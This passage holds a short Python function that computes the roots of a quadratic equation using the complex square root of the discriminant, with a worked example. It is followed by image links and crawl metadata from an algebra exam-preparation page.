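    """Roots of a*x**2 + b*x + c = 0 for real coefficients with a != 0."""
    if a == 0:
        raise ValueError("'a' must be non-zero for a quadratic equation")
    d = cmath.sqrt(b * b - 4 * a * c)        # square root of the discriminant
    return (-b + d) / (2 * a), (-b - d) / (2 * a)

# x^2 - 5x + 6 = 0 factors as (x - 2)(x - 3), so the roots are 3 and 2:
print(quadratic_roots(1, -5, 6))             # -> ((3+0j), (2+0j))
```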
[ null, "https://gs-post-images.grdp.co/2018/12/screenshot-2018-12-21-at-3-img1545387500435-75.png-rs-high-webp.png", null, "https://gs-post-images.grdp.co/2018/12/screenshot-2018-12-21-at-3-img1545387500435-75.png-rs-high-webp.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93391293,"math_prob":0.8224255,"size":4797,"snap":"2021-31-2021-39","text_gpt3_token_len":1058,"char_repetition_ratio":0.13227624,"word_repetition_ratio":0.0,"special_character_ratio":0.21325828,"punctuation_ratio":0.12034079,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9846185,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-03T05:09:55Z\",\"WARC-Record-ID\":\"<urn:uuid:2ebd7f39-3e99-4536-a47d-4b4ab0adb775>\",\"Content-Length\":\"205471\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d1746916-b991-434d-9937-b79731c08cb5>\",\"WARC-Concurrent-To\":\"<urn:uuid:28e3788e-4c0e-427b-9445-09bc48b735ba>\",\"WARC-IP-Address\":\"104.17.13.38\",\"WARC-Target-URI\":\"https://gradeup.co/ssc-exams/algebra\",\"WARC-Payload-Digest\":\"sha1:TGUDNBXWSVHMCBBJ3Z7P7M7PRJPK7D26\",\"WARC-Block-Digest\":\"sha1:335TEJ6Y3MKCL4OD6HTIJINW7DFXGFPV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154420.77_warc_CC-MAIN-20210803030201-20210803060201-00604.warc.gz\"}"}